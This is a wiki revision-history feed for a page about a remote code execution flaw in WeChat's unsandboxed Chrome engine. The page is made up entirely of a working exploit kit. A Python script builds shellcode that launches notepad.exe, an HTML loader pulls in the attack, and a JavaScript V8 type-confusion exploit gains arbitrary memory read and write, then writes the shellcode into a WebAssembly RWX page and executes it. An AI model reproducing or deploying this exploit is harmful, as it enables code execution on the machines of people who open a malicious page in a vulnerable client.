https://pwnwiki.com/index.php?action=history&feed=atom&title=%E5%BE%AE%E4%BF%A1_%EF%BC%88Wechat%EF%BC%89_%E7%84%A1%E6%B2%99%E7%AE%B1%E8%AA%BF%E7%94%A8Chrome%E5%85%A7%E6%A0%B8_RCE%E6%BC%8F%E6%B4%9E微信 (Wechat) 無沙箱調用Chrome內核 RCE漏洞 - Revision history2026-04-09T18:34:08ZRevision history for this page on the wikiMediaWiki 1.35.1https://pwnwiki.com/index.php?title=%E5%BE%AE%E4%BF%A1_%EF%BC%88Wechat%EF%BC%89_%E7%84%A1%E6%B2%99%E7%AE%B1%E8%AA%BF%E7%94%A8Chrome%E5%85%A7%E6%A0%B8_RCE%E6%BC%8F%E6%B4%9E&diff=1726&oldid=prevPwnwiki: Created page with "==EXP== ===core.py=== <pre> # only python3 supported payload = b"notepad.exe" shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,13848596..."2021-04-17T02:48:48Z<p>Created page with "==EXP== ===core.py=== <pre> # only python3 supported payload = b"notepad.exe" shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,13848596..."</p>
<p><b>New page</b></p><div>==EXP==<br />
===core.py===<br />
<pre><br />
# only python3 supported<br />
<br />
payload = b"notepad.exe"<br />
shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216]<br />
data = [payload[max(0, i-4):i] for i in range(1, len(payload)+4, 4)]<br />
data[0] = b'\xda\xff\xd5c\x00\x00\x00\x00'[:3] + data[0]<br />
data[-1] = data[-1] + (4 - len(data[-1])) * b'\x00'<br />
ret = [ _ + b'\x00\x00\x00\x00' for _ in data]<br />
code = [int().from_bytes(_, byteorder='little', signed=True) for _ in ret]<br />
print("replace it to exploit.js:\nvar shellcode = [{}]".format(shellcode + code))<br />
</pre><br />
<br />
===exploit.html===<br />
<pre><br />
<script src="exploit.js"></script><br />
</pre><br />
<br />
===exploit.js===<br />
<pre><br />
/*<br />
BSD 2-Clause License<br />
Copyright (c) 2021, rajvardhan agarwal<br />
All rights reserved.<br />
Redistribution and use in source and binary forms, with or without<br />
modification, are permitted provided that the following conditions are met:<br />
1. Redistributions of source code must retain the above copyright notice, this<br />
list of conditions and the following disclaimer.<br />
2. Redistributions in binary form must reproduce the above copyright notice,<br />
this list of conditions and the following disclaimer in the documentation<br />
and/or other materials provided with the distribution.<br />
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"<br />
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE<br />
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE<br />
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE<br />
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL<br />
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR<br />
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER<br />
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,<br />
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE<br />
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.<br />
*/<br />
<br />
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])<br />
var wasm_mod = new WebAssembly.Module(wasm_code);<br />
var wasm_instance = new WebAssembly.Instance(wasm_mod);<br />
var f = wasm_instance.exports.main;<br />
<br />
var buf = new ArrayBuffer(8);<br />
var f64_buf = new Float64Array(buf);<br />
var u64_buf = new Uint32Array(buf);<br />
let buf2 = new ArrayBuffer(0x150);<br />
<br />
function ftoi(val) {<br />
f64_buf[0] = val;<br />
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);<br />
}<br />
<br />
function itof(val) {<br />
u64_buf[0] = Number(val & 0xffffffffn);<br />
u64_buf[1] = Number(val >> 32n);<br />
return f64_buf[0];<br />
}<br />
<br />
const _arr = new Uint32Array([2**31]);<br />
<br />
function foo(a) {<br />
var x = 1;<br />
x = (_arr[0] ^ 0) + 1;<br />
<br />
x = Math.abs(x);<br />
x -= 2147483647;<br />
x = Math.max(x, 0);<br />
<br />
x -= 1;<br />
if(x==-1) x = 0;<br />
<br />
var arr = new Array(x);<br />
arr.shift();<br />
var cor = [1.1, 1.2, 1.3];<br />
<br />
return [arr, cor];<br />
}<br />
<br />
for(var i=0;i<0x3000;++i)<br />
foo(true);<br />
<br />
var x = foo(false);<br />
var arr = x[0];<br />
var cor = x[1];<br />
<br />
const idx = 6;<br />
arr[idx+10] = 0x4242;<br />
<br />
function addrof(k) {<br />
arr[idx+1] = k;<br />
return ftoi(cor[0]) & 0xffffffffn;<br />
}<br />
<br />
function fakeobj(k) {<br />
cor[0] = itof(k);<br />
return arr[idx+1];<br />
}<br />
<br />
var float_array_map = ftoi(cor[3]);<br />
<br />
var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];<br />
var fake = fakeobj(addrof(arr2) + 0x20n);<br />
<br />
function arbread(addr) {<br />
if (addr % 2n == 0) {<br />
addr += 1n;<br />
}<br />
arr2[1] = itof((2n << 32n) + addr - 8n);<br />
return (fake[0]);<br />
}<br />
<br />
function arbwrite(addr, val) {<br />
if (addr % 2n == 0) {<br />
addr += 1n;<br />
}<br />
arr2[1] = itof((2n << 32n) + addr - 8n);<br />
fake[0] = itof(BigInt(val));<br />
}<br />
<br />
function copy_shellcode(addr, shellcode) {<br />
let dataview = new DataView(buf2);<br />
let buf_addr = addrof(buf2);<br />
let backing_store_addr = buf_addr + 0x14n;<br />
arbwrite(backing_store_addr, addr);<br />
<br />
for (let i = 0; i < shellcode.length; i++) {<br />
dataview.setUint32(4*i, shellcode[i], true);<br />
}<br />
}<br />
<br />
var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));<br />
console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));<br />
var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];<br />
copy_shellcode(rwx_page_addr, shellcode);<br />
f();<br />
</pre></div>Pwnwiki